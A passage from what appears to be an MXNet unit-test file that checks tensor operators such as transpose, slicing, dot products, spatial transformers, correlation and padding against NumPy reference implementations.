sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(lo, hi):
# Renamed parameters to avoid shadowing the `mx` (mxnet) module name.
n1 = np.random.randint(lo, hi)
n2 = np.random.randint(lo, hi-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for testing convenience, the third and fourth input dims should be 4*x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
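# Illustrative sketch, not part of the original test suite: with the loc-net conv/fc
# weights zeroed and the fc bias set to [0.5, 0, 0, 0, 0.5, 0], the affine transform in
# test_stn scales normalized sampling coordinates by 0.5, so the bilinear sampler reads
# the central half of the input along each spatial axis -- which is why the expected
# forward output above is data[:, :, h//4:h-h//4, w//4:w-w//4].  The helper name below
# is hypothetical and is never called by the tests.
def _example_stn_center_crop_coords(h=9):
    # Normalized target coordinates in [-1, 1], scaled by 0.5 and mapped back to pixels.
    target = np.linspace(-1, 1, (h + 1) // 2)
    src = (0.5 * target + 1) * (h - 1) / 2.0
    # All sampled source positions stay inside the central crop used by the assertion above.
    assert src.min() >= h // 4 and src.max() <= h - 1 - h // 4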
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
continue  # a 1-D dot has no separate contraction dim, so only k == 1 is meaningful
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
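# Minimal sketch (illustrative only, not used by the tests): the output geometry of the
# reference implementation above follows directly from its padding/displacement
# arithmetic.  For (1, 1, 10, 10) inputs with pad_size=4, kernel_size=1, stride1=1,
# stride2=1 and max_displacement=4:
#   padded size   = 10 + 2*4 = 18
#   border_size   = max_displacement + kernel_radius = 4
#   top H = top W = (18 - 2*4) // 1 = 10
#   top_channels  = (2 * (4 // 1) + 1) ** 2 = 81
def _example_correlation_forward_shape():
    data = np.ones((1, 1, 10, 10))
    out, _, _ = correlation_forward(data, data, pad_size=4, kernel_size=1,
                                    stride1=1, stride2=1, max_displacement=4,
                                    is_multiply=True)
    assert out.shape == (1, 81, 10, 10)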
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
msg = npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected: %s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
msg = npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected: %s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
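# Illustrative sketch of the pad_width regrouping used in check_pad_with_shape above:
# mx.symbol.Pad takes a flat tuple (before_0, after_0, before_1, after_1, ...) while
# np.pad expects one (before, after) pair per axis, so zip(*[iter(pad_width)] * 2)
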